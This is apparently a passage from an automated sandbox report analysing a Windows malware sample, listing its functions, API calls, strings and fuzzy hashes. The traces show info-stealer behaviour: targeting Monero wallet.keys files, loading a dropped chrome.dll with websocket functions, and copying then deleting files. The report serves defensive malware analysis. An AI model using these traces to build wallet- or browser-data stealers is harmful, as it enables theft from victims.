                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: f22d39363887b092079493d0a9798e52287352d01323e70f76b2b5e7b8ec9e17
                                        • Instruction ID: 9903e1b14129666543a8ad07e6578e36d12a52d7938f5c4f2fe7ac9857a3b26c
                                        • Opcode Fuzzy Hash: f22d39363887b092079493d0a9798e52287352d01323e70f76b2b5e7b8ec9e17
                                        • Instruction Fuzzy Hash: 3101CD79A4420DBFDB04DFE4DC49FAE7778BB88701F108295FA15A7290D6749A00CBA4
                                        Function 004FCB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: 7c486c9fba4c979a1cc1ad1f1e583b1e4acb8da7caa5ce556ad1eb965b2dfdd3
                                        • Instruction ID: 2ac1b0b6038d0644da5159327a0871013fd6894b972cb5fd344434c3cd69e97b
                                        • Opcode Fuzzy Hash: 7c486c9fba4c979a1cc1ad1f1e583b1e4acb8da7caa5ce556ad1eb965b2dfdd3
                                        • Instruction Fuzzy Hash: 634128B010078C9EDB318B24CEC4FFB7BE99B45304F1444EDEA8A97182D2759A45DF68
                                        Function 004F68D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 004F6903
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 004F69C6
                                        • ExitProcess.KERNEL32 ref: 004F69F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: bf16e9f1cd3d06068b587cc0eff1060e113ce78a4768bb899a47df17d001c314
                                        • Instruction ID: 7435054bb902377a39e330a1a2785967a5bb0eb585baac8709f2c3f3c78d4309
                                        • Opcode Fuzzy Hash: bf16e9f1cd3d06068b587cc0eff1060e113ce78a4768bb899a47df17d001c314
                                        • Instruction Fuzzy Hash: F83128F1901218AADB15EB91DC92FEEB778AF48304F40418EF30966191DF786B48CF69
                                        Function 004F8950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00500E10,00000000,?), ref: 004F89BF
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F89C6
                                        • wsprintfA.USER32 ref: 004F89E0
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: 258948f8afee18ed15e7a5740dc25dd0799de1fee177c633ae001d3e39419026
                                        • Instruction ID: f0759327fae63ed0984612d40a94dba65555cff16d5a2ecd5bf9b47fe21c4be8
                                        • Opcode Fuzzy Hash: 258948f8afee18ed15e7a5740dc25dd0799de1fee177c633ae001d3e39419026
                                        • Instruction Fuzzy Hash: E92133B1A44208AFDB04DF94DD45FAEBBB8FB48711F108219F615B72C0C7795900CBA5
                                        Function 004EA090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 004EA098
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                        • API String ID: 1029625771-1545816527
                                        • Opcode ID: 2624ec209eb2c34f9fc1a10a837f3aa71b68cc11e641b8b139cb9c4cb898d0bd
                                        • Instruction ID: 57498865f51bf90bb75b3b40632bc9b1519d70efceb5b21e04016bc7d41e2ef0
                                        • Opcode Fuzzy Hash: 2624ec209eb2c34f9fc1a10a837f3aa71b68cc11e641b8b139cb9c4cb898d0bd
                                        • Instruction Fuzzy Hash: A1F01D7065C244AED709BB65EC48F5636A4A785741F008627F005A7290C7BD6894CB6F
                                        Function 004F8EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004F96AE,00000000), ref: 004F8EEB
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F8EF2
                                        • wsprintfW.USER32 ref: 004F8F08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: dc26f170ace6caa5789b116a072cb0376deabdcb65ff1a73f126237a9b0079d6
                                        • Instruction ID: 43e0ad26ac179f573eaafc0c5aa44b97fa7d8433904cba9514f034d845688def
                                        • Opcode Fuzzy Hash: dc26f170ace6caa5789b116a072cb0376deabdcb65ff1a73f126237a9b0079d6
                                        • Instruction Fuzzy Hash: D9E04670A48208BBDB04DBA4DD0AFAD7BB8FB84301F008294FD0996380DA759A00CBA5
                                        Function 004EA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004EAA11
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 004EAB2F
                                        • lstrlen.KERNEL32(00000000), ref: 004EADEC
                                          • Part of subcall function 004FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004FAAF6
                                        • DeleteFileA.KERNEL32(00000000), ref: 004EAE73
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: a86f723ab0ab9a33ffe4a728225bc7b099bc2458e80c261db7c3c28dc3b2d56c
                                        • Instruction ID: 2918081e4041d2b2c9575b1f5f14fc917d1c7b88344e5b4d3d4d8348a7884a1c
                                        • Opcode Fuzzy Hash: a86f723ab0ab9a33ffe4a728225bc7b099bc2458e80c261db7c3c28dc3b2d56c
                                        • Instruction Fuzzy Hash: E4E1D1B291010C9BCB04EBA5DDA5EFE7339AF54304F50855EF21A62091DF387A5CCB6A
                                        Function 004ED500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004ED581
                                        • lstrlen.KERNEL32(00000000), ref: 004ED798
                                        • lstrlen.KERNEL32(00000000), ref: 004ED7AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 004ED82B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: ee70e763bfb40669cf219e10de0820d11feaa6d84abd1f0cd2d0b3a2d617e77b
                                        • Instruction ID: 76b03a16cc6133df58d35fbdb1cf0b9a47300fbe65b22bae8cdc93da51b6ccfc
                                        • Opcode Fuzzy Hash: ee70e763bfb40669cf219e10de0820d11feaa6d84abd1f0cd2d0b3a2d617e77b
                                        • Instruction Fuzzy Hash: 3991E7B291010C9BCB04FBA5DC96EFE7339AF54304F50455EF21A66191EF387A18CB6A
                                        Function 004ED880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                          • Part of subcall function 004F8CF0: GetSystemTime.KERNEL32(00500E1B,0145A610,005005B6,?,?,004E13F9,?,0000001A,00500E1B,00000000,?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004F8D16
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004ED901
                                        • lstrlen.KERNEL32(00000000), ref: 004EDA9F
                                        • lstrlen.KERNEL32(00000000), ref: 004EDAB3
                                        • DeleteFileA.KERNEL32(00000000), ref: 004EDB32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 8ef79b1fc30cae878e7924f43099dfcc6ca490a7b54ba8cec6c3e00aca5d898c
                                        • Instruction ID: 3e937c0cf9f08a353fcfe7c93181b6b02d7c3519e6dcaa08fd23e3d63acc0fcb
                                        • Opcode Fuzzy Hash: 8ef79b1fc30cae878e7924f43099dfcc6ca490a7b54ba8cec6c3e00aca5d898c
                                        • Instruction Fuzzy Hash: 1581E6B191010C9BCB04FBA5DCA6EFE7339AF54304F40455EF21A66191EF387A18CB6A
                                        Function 0055FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
